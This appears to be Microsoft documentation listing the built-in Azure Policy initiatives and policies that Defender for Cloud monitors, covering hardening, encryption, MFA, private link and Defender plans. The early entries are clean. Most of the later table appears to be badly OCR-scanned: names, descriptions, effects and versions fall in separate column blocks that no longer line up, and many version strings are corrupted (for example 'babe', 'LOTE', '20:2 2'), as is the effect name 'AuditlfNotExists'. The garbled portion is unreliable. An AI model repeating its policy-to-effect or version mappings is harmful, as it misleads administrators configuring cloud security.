The name of each built-in policy definition links to the policy definition in the Azure portal. Use the link in the Version column to view the source on the Azure Policy GitHub repo. 


Microsoft Defender for Cloud initiatives 


To learn about the built-in initiatives that are monitored by Defender for Cloud, see the following table: 


Name: [Preview]: Configure machines to create the default Microsoft Defender for Cloud pipeline using Azure Monitor Agent 
Description: Configure machines to automatically install the Azure Monitor and Azure Security agents. Microsoft Defender for Cloud collects events from the agents and uses them to provide security alerts and tailored hardening tasks (recommendations). Create a resource group, a Data Collection Rule and Log Analytics workspace in the same region as the machine to store audit records. Target machines must be in a supported location. 
Policies: 13 
Version: 1.0.1-preview 


Name: [Preview]: Configure machines to create the user-defined Microsoft Defender for Cloud pipeline using Azure Monitor Agent 
Description: Configure machines to automatically install the Azure Monitor and Azure Security agents. Microsoft Defender for Cloud collects events from the agents and uses them to provide security alerts and tailored hardening tasks (recommendations). Use the user-provided Log Analytics workspace to store audit records. Creates a resource group and a Data Collection Rule in the same region as the user-provided Log Analytics workspace. Target machines must be in a supported location. 
Policies: 13 
Version: 1.0.1-preview 


Name: [Preview]: Configure SQL VMs and Arc-enabled SQL Servers to install Microsoft Defender for SQL and AMA with a LA workspace 
Description: Microsoft Defender for SQL collects events from the agents and uses them to provide security alerts and tailored hardening tasks (recommendations). Creates a resource group and a Data Collection Rule and Log Analytics workspace in the same region as the machine. 
Policies: 9 
Version: 1.2.0-preview 


Name: [Preview]: Configure SQL VMs and Arc-enabled SQL Servers to install Microsoft Defender for SQL and AMA with a user-defined LA workspace 
Description: Microsoft Defender for SQL collects events from the agents and uses them to provide security alerts and tailored hardening tasks (recommendations). Creates a resource group and a Data Collection Rule in the same region as the user-defined Log Analytics workspace. 
Policies: 8 
Version: 1.1.0-preview 


Name: [Preview]: Deploy Microsoft Defender for Endpoint agent 
Description: Deploy Microsoft Defender for Endpoint agent on applicable images. 
Policies: 4 
Version: 1.0.0-preview 


Name: Configure Advanced Threat Protection to be enabled on open-source relational databases 
Description: Enable Advanced Threat Protection on your non-Basic tier open-source relational databases to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. See https://aka.ms/AzDforOpenSourceDBsDocu. 
Policies: 3 
Version: 1.0.1 


Name: Configure Azure Defender to be enabled on SQL Servers and SQL Managed Instances 
Description: Enable Azure Defender on your SQL Servers and SQL Managed Instances to detect anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases. 
Policies: 3 
Version: 3.0.0 


Name: Configure Microsoft Defender for Databases to be enabled 
Description: Configure Microsoft Defender for Databases to protect your Azure SQL Databases, Managed Instances, Open-source relational databases and Cosmos DB. 
Policies: 4 
Version: 1.0.0 


Name: Microsoft cloud security benchmark 
Description: The Microsoft cloud security benchmark initiative represents the policies and controls implementing security recommendations defined in Microsoft cloud security benchmark, see https://aka.ms/azsecbm. This also serves as the Microsoft Defender for Cloud default policy initiative. You can directly assign this initiative, or manage its policies and compliance results within Microsoft Defender for Cloud. 
Policies: 235 
Version: 57.23.1 


Defender for Cloud's default initiative (Microsoft cloud 
security benchmark) 


To learn about the built-in policies that are monitored by Defender for Cloud, see the following table: 


Policy name (Azure portal): [Preview]: All Internet traffic should be routed via your deployed Azure Firewall 
Description: Azure Security Center has identified that some of your subnets aren't protected with a next generation firewall. Protect your subnets from potential threats by restricting access to them with Azure Firewall or a supported next generation firewall. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 3.0.0-preview 


Policy name (Azure portal): [Preview]: API endpoints in Azure API Management should be authenticated 
Description: API endpoints published within Azure API Management should enforce authentication to help minimize security risk. Authentication mechanisms are sometimes implemented incorrectly or are missing. This allows attackers to exploit implementation flaws and to access data. Learn More about the OWASP API Threat for Broken User Authentication here: https://learn.microsoft.com/azure/api-management/mitigate-owasp-api-threats#broken-user-authentication 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 1.0.0-preview 


Policy name (Azure portal): [Preview]: API endpoints that are unused should be disabled and removed from the Azure API Management service 
Description: As a security best practice, API endpoints that haven't received traffic for 30 days are considered unused and should be removed from the Azure API Management service. Keeping unused API endpoints may pose a security risk to your organization. These may be APIs that should have been deprecated from the Azure API Management service but may have been accidentally left active. Such APIs typically do not receive the most up to date security coverage. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 1.0.0-preview 


Policy name (Azure portal): [Preview]: Azure Arc enabled Kubernetes clusters should have Microsoft Defender for Cloud extension installed 
Description: Microsoft Defender for Cloud extension for Azure Arc provides threat protection for your Arc enabled Kubernetes clusters. The extension collects data from all nodes in the cluster and sends it to the Azure Defender for Kubernetes backend in the cloud for further analysis. Learn more in https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-enable?pivots=defender-for-container-arc. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 6.0.0-preview 


Policy name (Azure portal): [Preview]: Certificates should have the specified maximum validity period 
Description: Manage your organizational compliance requirements by specifying the maximum amount of time that a certificate can be valid within your key vault. 
Effect(s): audit, Audit, deny, Deny, disabled, Disabled 
Version (GitHub): 2.2.0-preview 


Policy name (Azure portal): [Preview]: Guest Attestation extension should be installed on supported Linux virtual machines 
Description: Install Guest Attestation extension on supported Linux virtual machines to allow Azure Security Center to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment applies to Trusted Launch and Confidential Linux virtual machines. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 6.0.0-preview 


Policy name (Azure portal): [Preview]: Guest Attestation extension should be installed on supported Linux virtual machines scale sets 
Description: Install Guest Attestation extension on supported Linux virtual machines scale sets to allow Azure Security Center to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment applies to Trusted Launch and Confidential Linux virtual machine scale sets. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 5.1.0-preview 


Policy name (Azure portal): [Preview]: Guest Attestation extension should be installed on supported Windows virtual machines 
Description: Install Guest Attestation extension on supported virtual machines to allow Azure Security Center to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment applies to Trusted Launch and Confidential Windows virtual machines. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 4.0.0-preview 


Policy name (Azure portal): [Preview]: Guest Attestation extension should be installed on supported Windows virtual machines scale sets 
Description: Install Guest Attestation extension on supported virtual machines scale sets to allow Azure Security Center to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment applies to Trusted Launch and Confidential Windows virtual machine scale sets. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 3.1.0-preview 


Policy name (Azure portal): [Preview]: Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost. 
Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys; temp disks and data caches aren't encrypted, and data isn't encrypted when flowing between compute and storage resources. Use Azure Disk Encryption or EncryptionAtHost to encrypt all this data. Visit https://aka.ms/diskencryptioncomparison to compare encryption offerings. This policy requires two prerequisites to be deployed to the policy assignment scope. For details, visit https://aka.ms/gcpol. 
Effect(s): AuditIfNotExists, Disabled 
Version (GitHub): 1.1.0-preview 


Policy name (Azure portal): 
[Preview]: Linux virtual machines should use only signed and trusted boot components 
[Preview]: Log Analytics extension should be installed on your Linux Azure Arc machines 
[Preview]: Log Analytics extension should be installed on your Windows Azure Arc machines 
[Preview]: Microsoft Defender for APIs should be enabled 
[Preview]: Network traffic data collection agent should be installed on Linux virtual machines 
[Preview]: Network traffic data collection agent should be installed on Windows virtual machines 
[Preview]: Secure Boot should be enabled on supported Windows virtual machines 
[Preview]: Storage account public access should be disallowed 
[Preview]: System updates should be installed on your 


Description: 
All OS boot components (boot loader, kernel, kernel drivers) must be signed by trusted publishers. Defender for Cloud has identified untrusted OS boot components on one or 
more of your Linux machines. To protect your machines from 
potentially malicious components, add them to your allow 
list or remove the identified components. 


This policy audits Linux Azure Arc machines if the Log 
Analytics extension is not installed. 


This policy audits Windows Azure Arc machines if the Log 
Analytics extension is not installed. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Security Center uses the Microsoft Dependency agent to 
collect network traffic data from your Azure virtual machines 
to enable advanced network protection features such as 
traffic visualization on the network map, network hardening 
recommendations and specific network threats. 


Security Center uses the Microsoft Dependency agent to 
collect network traffic data from your Azure virtual machines 
to enable advanced network protection features such as 
traffic visualization on the network map, network hardening 
recommendations and specific network threats. 


Enable Secure Boot on supported Windows virtual machines 
to mitigate against malicious and unauthorized changes to 
the boot chain. Once enabled, only trusted bootloaders, 
kernel and kernel drivers will be allowed to run. This 
assessment applies to Trusted Launch and Confidential 
Windows virtual machines. 


Anonymous public read access to containers and blobs in 
Azure Storage is a convenient way to share data but might 
present security risks. To prevent data breaches caused by 
undesired anonymous access, Microsoft recommends 
preventing public access to a storage account unless your 
scenario requires it. 


Your machines are missing system, security, and critical 
updates. Software updates often include critical patches to 
security holes. Such holes are frequently exploited in 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


1.0.1 = 
preview E 


1.0.1- 
preview E 


1.00;2- 
preview E 


10:2- 
preview E 


babe 
preview E 


4.0.0- 
preview E 


3:1.0- 
preview E 


1.0.0- 
preview E 


Policy name 


(Azure portal) 


machines (powered 
by Update Center) £ 


[Preview]: vTPM 
should be enabled on 
supported virtual 
machines E 


[Preview]: Windows 
virtual machines 
should enable Azure 
Disk Encryption or 
EncryptionAtHost. SZ 


A maximum of 3 
owners should be 
designated for your 
subscription £ 


A vulnerability 
assessment solution 
should be enabled on 
your virtual machines Z 


Accounts with owner 
permissions on Azure 
resources should be 
MFA enabled Z 


Accounts with read 
permissions on Azure 
resources should be 
MFA enabled # 


Accounts with write 
permissions on Azure 
resources should be 
MFA enabled Z 


Adaptive application 
controls for defining 
safe applications 
should be enabled on 
your machines Z 


Adaptive network 
hardening 


Description 


malware attacks so it's vital to keep your software updated. 
To install all outstanding patches and secure your machines, 
follow the remediation steps. 


Enable virtual TPM device on supported virtual machines to 
facilitate Measured Boot and other OS security features that 
require a TPM. Once enabled, vTPM can be used to attest 
boot integrity. This assessment only applies to trusted launch 
enabled virtual machines. 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; temp disks 
and data caches aren't encrypted, and data isn't encrypted 
when flowing between compute and storage resources. Use 
Azure Disk Encryption or EncryptionAtHost to encrypt all this 
data.Visit https://aka.ms/diskencryptioncomparison E to 
compare encryption offerings. This policy requires two 
prerequisites to be deployed to the policy assignment scope. 
For details, visit https://aka.ms/gcpol £. 


It is recommended to designate up to 3 subscription owners 
in order to reduce the potential for breach by a 
compromised owner. 


Audits virtual machines to detect whether they are running a 
supported vulnerability assessment solution. A core 
component of every cyber risk and security program is the 
identification and analysis of vulnerabilities. Azure Security 
Center's standard pricing tier includes vulnerability scanning 
for your virtual machines at no extra cost. Additionally, 
Security Center can automatically deploy this tool for you. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with owner permissions to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with read privileges to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with write privileges to prevent a 
breach of accounts or resources. 


Enable application controls to define the list of known-safe 
applications running on your machines, and alert you when 
other applications run. This helps harden your machines 
against malware. To simplify the process of configuring and 
maintaining your rules, Security Center uses machine 
learning to analyze the applications running on each 
machine and suggest the list of known-safe applications. 


Azure Security Center analyzes the traffic patterns of Internet 
facing virtual machines and provides Network Security Group 


Effect(s) 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.1.0- 


preview E 


3.0.0 2 


3.0.0 7 


1.0.0 4 


1.0.07 


1.0.0 2 


3.0.02 


30.02 


Policy name 


(Azure portal) 


recommendations 
should be applied on 
internet facing virtual 
machines E 


All network ports 
should be restricted 
on network security 
groups associated to 
your virtual machine Z 


Allowlist rules in your 
adaptive application 
control policy should 
be updated 7 


An Azure Active 
Directory 
administrator should 
be provisioned for 
MySQL servers E 


An Azure Active 
Directory 
administrator should 
be provisioned for 
PostgreSQL servers E 


An Azure Active 
Directory 
administrator should 
be provisioned for 
SQL servers E 


API Management APIs 
should use only 
encrypted protocols 7 


API Management calls 
to API backends 
should be 
authenticated 7 


API Management calls 
to API backends 
should not bypass 
certificate thumbprint 
or name validation Si 


API Management 
direct management 
endpoint should not 
be enabled 7 


Description 


rule recommendations that reduce the potential attack 
surface 


Azure Security Center has identified some of your network 
security groups’ inbound rules to be too permissive. Inbound 
rules should not allow access from ‘Any’ or ‘Internet’ ranges. 
This can potentially enable attackers to target your resources. 


Monitor for changes in behavior on groups of machines 
configured for auditing by Azure Security Center's adaptive 
application controls. Security Center uses machine learning 
to analyze the running processes on your machines and 
suggest a list of known-safe applications. These are 
presented as recommended apps to allow in adaptive 
application control policies. 


Audit provisioning of an Azure Active Directory administrator 
for your MySQL server to enable Azure AD authentication. 
Azure AD authentication enables simplified permission 
management and centralized identity management of 
database users and other Microsoft services 


Audit provisioning of an Azure Active Directory administrator 
for your PostgreSQL server to enable Azure AD 
authentication. Azure AD authentication enables simplified 
permission management and centralized identity 
management of database users and other Microsoft services 


Audit provisioning of an Azure Active Directory administrator 
for your SQL server to enable Azure AD authentication. Azure 
AD authentication enables simplified permission 
management and centralized identity management of 
database users and other Microsoft services 


To ensure security of data in transit, APIs should be available 
only through encrypted protocols, like HTTPS or WSS. Avoid 
using unsecured protocols, such as HTTP or WS. 


Calls from API Management to backends should use some 
form of authentication, whether via certificates or credentials. 
Does not apply to Service Fabric backends. 


To improve the API security, API Management should 
validate the backend server certificate for all API calls. Enable 
SSL certificate thumbprint and name validation. 


The direct management REST API in Azure API Management 
bypasses Azure Resource Manager role-based access control, 
authorization, and throttling mechanisms, thus increasing the 
vulnerability of your service. 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Version 


(GitHub) 


3.0.0 7 


3.0.0 Z 


1.1.07 


1.0.0 4 


1.0.0 4 


20:2 2 


10.12 


1.0.2 2 


IZE 


Policy name 


(Azure portal) 


API Management 
minimum API version 
should be set to 
2019-12-01 or higher £ 


API Management 
secret named values 
should be stored in 
Azure Key Vault Z 


API Management 
services should use a 
virtual network £ 


API Management 
should disable public 
network access to the 
service configuration 
endpoints £ 


API Management 
subscriptions should 
not be scoped to all 
APIs Z 


App Configuration 
should use private 
link Z 


App Service apps 
should have ‘Client 
Certificates (Incoming 
client certificates)’ 
enabled 7 


App Service apps 
should have remote 


debugging turned off Z 


App Service apps 
should have resource 
logs enabled Z 


Description 


To prevent service secrets from being shared with read-only 
users, the minimum API version should be set to 2019-12-01 
or higher. 


Named values are a collection of name and value pairs in 
each API Management service. Secret values can be stored 
either as encrypted text in API Management (custom secrets) 
or by referencing secrets in Azure Key Vault. To improve 
security of API Management and secrets, reference secret 
named values from Azure Key Vault. Azure Key Vault 
supports granular access management and secret rotation 
policies. 


Azure Virtual Network deployment provides enhanced 
security, isolation and allows you to place your API 
Management service in a non-internet routable network that 
you control access to. These networks can then be connected 
to your on-premises networks using various VPN 
technologies, which enables access to your backend services 
within the network and/or on-premises. The developer portal 
and API gateway, can be configured to be accessible either 
from the Internet or only within the virtual network. 


To improve the security of API Management services, restrict 
connectivity to service configuration endpoints, like direct 
access management API, Git configuration management 
endpoint, or self-hosted gateways configuration endpoint. 


API Management subscriptions should be scoped to a 
product or an individual API instead of all APIs, which could 
result in an excessive data exposure. 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your app configuration instances instead of the entire 
service, you'll also be protected against data leakage risks. 
Learn more at: https://aka.ms/appconfig/private-endpoint £2 . 


Client certificates allow for the app to request a certificate for 
incoming requests. Only clients that have a valid certificate 
will be able to reach the app. 


Remote debugging requires inbound ports to be opened on 
an App Service app. Remote debugging should be turned 
off. 


Audit enabling of resource logs on the app. This enables you 
to recreate activity trails for investigation purposes if a 
security incident occurs or your network is compromised. 


Effect(s) 


Audit, Deny, Disabled 


Audit, Disabled, Deny 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled, Deny 


AuditlfNotExists, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


LOTE 


1022 


1.0.24 


MOT 


1.1.02 


1026 


3.0.0 £ 


2.0.0 2 


2.0.12 


Policy name 


(Azure portal) 


App Service apps 
should not have CORS 
configured to allow 
every resource to 
access your apps £ 


App Service apps 
should only be 


accessible over HTTPS ¢ 


App Service apps 
should require FTPS 
only Z 


App Service apps 
should use managed 
identity 7 


App Service apps 
should use the latest 
TLS version E 


Audit usage of 
custom RBAC roles E 


Auditing on SQL 
server should be 
enabled Z 


Authentication to 
Linux machines 
should require SSH 
keys E 


Authorized IP ranges 
should be defined on 
Kubernetes Services č 


Auto provisioning of 
the Log Analytics 
agent should be 
enabled on your 
subscription E 


Description Effect(s) Version 


(GitHub) 


Cross-Origin Resource Sharing (CORS) should not allow all AuditlfNotExists, Disabled 2.0.0 7 
domains to access your app. Allow only required domains to 


interact with your app. 


Use of HTTPS ensures server/service authentication and 40.07 


protects data in transit from network layer eavesdropping 


Audit, Disabled, Deny 


attacks. 


Enable FTPS enforcement for enhanced security. AuditlfNotExists, Disabled 3.0.0 Z 


Use a managed identity for enhanced authentication security AuditlfNotExists, Disabled 3.0.0 Z 


Periodically, newer versions are released for TLS either due to AuditlfNotExists, Disabled 2.0.1 Z 
security flaws, include additional functionality, and enhance 

speed. Upgrade to the latest TLS version for App Service 

apps to take advantage of security fixes, if any, and/or new 


functionalities of the latest version. 


Audit built-in roles such as ‘Owner, Contributer, Reader' 1.0.12 
instead of custom RBAC roles, which are error prone. Using 
custom roles is treated as an exception and requires a 


rigorous review and threat modeling 


Audit, Disabled 


Auditing on your SQL Server should be enabled to track AuditlfNotExists, Disabled 2.0.0 Z 
database activities across all databases on the server and 


save them in an audit log. 


Although SSH itself provides an encrypted connection, using 3.1.07 
passwords with SSH still leaves the VM vulnerable to brute- 


force attacks. The most secure option for authenticating to 


AuditlfNotExists, Disabled 


an Azure Linux virtual machine over SSH is with a public- 
private key pair, also known as SSH keys. Learn more: 
https://docs.microsoft.com/azure/virtual- 
machines/linux/create-ssh-keys-detailed. 


Restrict access to the Kubernetes Service Management API Audit, Disabled 2.0.1 4 
by granting API access only to IP addresses in specific 

ranges. It is recommended to limit access to authorized IP 

ranges to ensure that only applications from allowed 


networks can access the cluster. 


To monitor for security vulnerabilities and threats, Azure AuditlfNotExists, Disabled 1.0.17 
Security Center collects data from your Azure virtual 

machines. Data is collected by the Log Analytics agent, 

formerly known as the Microsoft Monitoring Agent (MMA), 

which reads various security-related configurations and event 

logs from the machine and copies the data to your Log 

Analytics workspace for analysis. We recommend enabling 

auto provisioning to automatically deploy the agent to all 


supported Azure VMs and any new ones that are created. 


Policy name 


(Azure portal) 


Automation account 
variables should be 
encrypted £ 


Azure Arc enabled 
Kubernetes clusters 
should have the Azure 
Policy extension 
installed Z 


Azure Backup should 
be enabled for Virtual 
Machines E 


Azure Cache for Redis 
should use private 
link Z 


Azure Cosmos DB 
accounts should have 
firewall rules Z 


Azure Cosmos DB 
accounts should use 
customer-managed 
keys to encrypt data 
at rest £ 


Azure Cosmos DB 
should disable public 
network access E 


Azure Databricks 
Clusters should 
disable public IP Z 


Azure Databricks 
Workspaces should 


be in a virtual network E 


Description Effect(s) 


It is important to enable encryption of Automation account Audit, Deny, Disabled 


variable assets when storing sensitive data 


The Azure Policy extension for Azure Arc provides at-scale AuditlfNotExists, Disabled 
enforcements and safeguards on your Arc enabled 
Kubernetes clusters in a centralized, consistent manner. Learn 


more at https://aka.ms/akspolicydoc £Z . 


Ensure protection of your Azure Virtual Machines by AuditlfNotExists, Disabled 
enabling Azure Backup. Azure Backup is a secure and cost 


effective data protection solution for Azure. 


Private endpoints lets you connect your virtual network to AuditlfNotExists, Disabled 
Azure services without a public IP address at the source or 

destination. By mapping private endpoints to your Azure 

Cache for Redis instances, data leakage risks are reduced. 

Learn more at: https://docs.microsoft.com/azure/azure- 


cache-for-redis/cache-private-link. 


Firewall rules should be defined on your Azure Cosmos DB 
accounts to prevent traffic from unauthorized sources. 
Accounts that have at least one IP rule defined with the 
virtual network filter enabled are deemed compliant. 
Accounts disabling public access are also deemed compliant. 


Audit, Deny, Disabled 


Use customer-managed keys to manage the encryption at 
rest of your Azure Cosmos DB. By default, the data is 
encrypted at rest with service-managed keys, but customer- 
managed keys are commonly required to meet regulatory 
compliance standards. Customer-managed keys enable the 
data to be encrypted with an Azure Key Vault key created 
and owned by you. You have full control and responsibility 
for the key lifecycle, including rotation and management. 
Learn more at https://aka.ms/cosmosdb-cmk Z. 


audit, Audit, deny, Deny, 
disabled, Disabled 


Disabling public network access improves security by 
ensuring that your CosmosDB account isn't exposed on the 
public internet. Creating private endpoints can limit exposure 
of your CosmosDB account. Learn more at: 
https://docs.microsoft.com/azure/cosmos-db/how-to- 
configure-private-endpoints#blocking-public-network- 


Audit, Deny, Disabled 


access-during-account-creation. 


Disabling public IP of clusters in Azure Databricks 
Workspaces improves security by ensuring that the clusters 
aren't exposed on the public internet. Learn more at: 
https://learn.microsoft.com/azure/databricks/security/secure- 
cluster-connectivity. 


Audit, Deny, Disabled 


Azure Virtual Networks provide enhanced security and 
isolation for your Azure Databricks Workspaces, as well as 
subnets, access control policies, and other features to further 
restrict access. Learn more at: 
https://docs.microsoft.com/azure/databricks/administration- 
guide/cloud-configurations/azure/vnet-inject. 


Audit, Deny, Disabled 


Version 


(GitHub) 


1.10% 


TAO 


3.0.0 7 


1.0.02 


20.02 


1.1.0¢ 


1.0.07 


10.12 


10.22 


Policy name 


(Azure portal) 


Azure Databricks 
Workspaces should 
disable public 
network access E 


Azure Databricks 
Workspaces should 
use private link? 


Azure DDoS 
Protection Standard 
should be enabled € 


Azure Defender for 
App Service should be 
enabled Z 


Azure Defender for 
Azure SQL Database 
servers should be 
enabled zZ 


Azure Defender for 
DNS should be 
enabled 7 


Azure Defender for 
Key Vault should be 
enabled zZ 


Azure Defender for 
open-source 
relational databases 
should be enabled zZ 


Azure Defender for 
Resource Manager 


Description 


Disabling public network access improves security by 
ensuring that the resource isn't exposed on the public 
internet. You can control exposure of your resources by 
creating private endpoints instead. Learn more at: 
https://learn.microsoft.com/azure/databricks/administration- 
guide/cloud-configurations/azure/private-link. 


Azure Private Link lets you connect your virtual networks to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
Azure Databricks workspaces, you can reduce data leakage 
risks. Learn more about private links at: 
https://aka.ms/adbpe Z. 


DDoS protection standard should be enabled for all virtual 
networks with a subnet that is part of an application gateway 
with a public IP. 


Azure Defender for App Service leverages the scale of the 
cloud, and the visibility that Azure has as a cloud provider, to 
monitor for common web app attacks. 


Azure Defender for SQL provides functionality for surfacing 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 
databases, and discovering and classifying sensitive data. 


Azure Defender for DNS provides an additional layer of 
protection for your cloud resources by continuously 
monitoring all DNS queries from your Azure resources. Azure 
Defender alerts you about suspicious activity at the DNS 
layer. Learn more about the capabilities of Azure Defender 
for DNS at https://aka.ms/defender-for-dns £ . Enabling this 
Azure Defender plan results in charges. Learn about the 
pricing details per region on Security Center's pricing page: 
https://aka.ms/pricing-security-center £ . 


Azure Defender for Key Vault provides an additional layer of 
protection and security intelligence by detecting unusual and 
potentially harmful attempts to access or exploit key vault 
accounts. 


Azure Defender for open-source relational databases detects 
anomalous activities indicating unusual and potentially 
harmful attempts to access or exploit databases. Learn more 
about the capabilities of Azure Defender for open-source 
relational databases at 
https://aka.ms/AzDforOpenSourceDBsDocu E, Important: 
Enabling this plan will result in charges for protecting your 
open-source relational databases. Learn about the pricing on 
Security Center's pricing page: https://aka.ms/pricing- 
security-center E 


Azure Defender for Resource Manager automatically 
monitors the resource management operations in your 


Effect(s) 


Audit, Deny, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


LOTE 


1.0.2 


3.0.02 


1.03¢ 


102¢ 


1.0.07 


1,032 


1.0.0 4 


1.0.07 


Policy name 


(Azure portal) 


should be enabled Z 


Azure Defender for 
servers should be 
enabled # 


Azure Defender for 
SQL servers on 
machines should be 
enabled Z 


Azure Defender for 
SQL should be 
enabled for 
unprotected Azure 
SQL servers E 


Azure Defender for 
SQL should be 
enabled for 
unprotected SQL 
Managed Instances Z 


Azure Event Grid 
domains should use 
private link & 


Azure Event Grid 
topics should use 
private link Z 


Azure Key Vault 
should have firewall 
enabled 7 


Azure Key Vaults 
should use private 
link Z 


Description Effect(s) Version 


(GitHub) 


organization. Azure Defender detects threats and alerts you 
about suspicious activity. Learn more about the capabilities 
of Azure Defender for Resource Manager at 
https://aka.ms/defender-for-resource-manager Z . Enabling 
this Azure Defender plan results in charges. Learn about the 
pricing details per region on Security Center's pricing page: 
https://aka.ms/pricing-security-center @ . 


Azure Defender for servers provides real-time threat AuditlfNotExists, Disabled 1.0.37 
protection for server workloads and generates hardening 


recommendations as well as alerts about suspicious activities. 


Azure Defender for SQL provides functionality for surfacing AuditlfNotExists, Disabled 1.0.2 7 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 


databases, and discovering and classifying sensitive data. 


Audit SQL servers without Advanced Data Security AuditlfNotExists, Disabled 2.0.1 Z 


Audit each SQL Managed Instance without advanced data AuditlfNotExists, Disabled 1022 


security. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.2 2 
Azure services without a public IP address at the source or 

destination. The Private Link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Event Grid domain instead of the entire service, you'll 

also be protected against data leakage risks. Learn more at: 


https://aka.ms/privateendpoints £. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.2 
Azure services without a public IP address at the source or 

destination. The Private Link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Event Grid topic instead of the entire service, you'll also 

be protected against data leakage risks. Learn more at: 


https://aka.ms/privateendpoints £. 


Enable the key vault firewall so that the key vault is not dU e 
accessible by default to any public IPs. Optionally, you can 


configure specific IP ranges to limit access to those networks. 


Audit, Deny, Disabled 


Learn more at: https://docs.microsoft.com/azure/key- 
vault/general/network-security 


Azure Private Link lets you connect your virtual networks to 12.12 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 


connectivity between the consumer and services over the 


[parameters('audit_effect')] 


Azure backbone network. By mapping private endpoints to 


Policy name 


(Azure portal) 


Azure Kubernetes 
Service clusters 
should have Defender 
profile enabled tz 


Azure Machine 
Learning compute 
instances should be 
recreated to get the 
latest software 
updates 7 


Azure Machine 
Learning Computes 
should be in a virtual 
network E 


Azure Machine 
Learning Computes 
should have local 
authentication 
methods disabled # 


Azure Machine 
Learning workspaces 
should be encrypted 
with a customer- 
managed key # 


Azure Machine 
Learning Workspaces 
should disable public 
network access E 


Azure Machine 
Learning workspaces 
should use private 
link Z 


Description 


key vault, you can reduce data leakage risks. Learn more 
about private links at: https://aka.ms/akvprivatelink £ . 


Microsoft Defender for Containers provides cloud-native 
Kubernetes security capabilities including environment 
hardening, workload protection, and run-time protection. 
When you enable the SecurityProfile- AzureDefender on your 
Azure Kubernetes Service cluster, an agent is deployed to 
your cluster to collect security event data. Learn more about 
Microsoft Defender for Containers in 
https://docs.microsoft.com/azure/defender-for- 
cloud/defender-for-containers-introduction?tabs =defender- 
for-container-arch-aks 


Ensure Azure Machine Learning compute instances run on 
the latest available operating system. Security is improved 
and vulnerabilities reduced by running with the latest 
security patches. For more information, visit 
https://aka.ms/azureml-ci-updates/ E. 


Azure Virtual Networks provide enhanced security and 
isolation for your Azure Machine Learning Compute Clusters 


and Instances, as well as subnets, access control policies, and 


other features to further restrict access. When a compute is 
configured with a virtual network, it is not publicly 
addressable and can only be accessed from virtual machines 
and applications within the virtual network. 


Disabling local authentication methods improves security by 
ensuring that Machine Learning Computes require Azure 
Active Directory identities exclusively for authentication. 
Learn more at: https://aka.ms/azure-ml-aad-policy £ . 


Manage encryption at rest of Azure Machine Learning 
workspace data with customer-managed keys. By default, 
customer data is encrypted with service-managed keys, but 
customer-managed keys are commonly required to meet 
regulatory compliance standards. Customer-managed keys 
enable the data to be encrypted with an Azure Key Vault key 
created and owned by you. You have full control and 
responsibility for the key lifecycle, including rotation and 
management. Learn more at https://aka.ms/azureml- 
workspaces-cmk E. 


Disabling public network access improves security by 
ensuring that the Machine Learning Workspaces aren't 
exposed on the public internet. You can control exposure of 


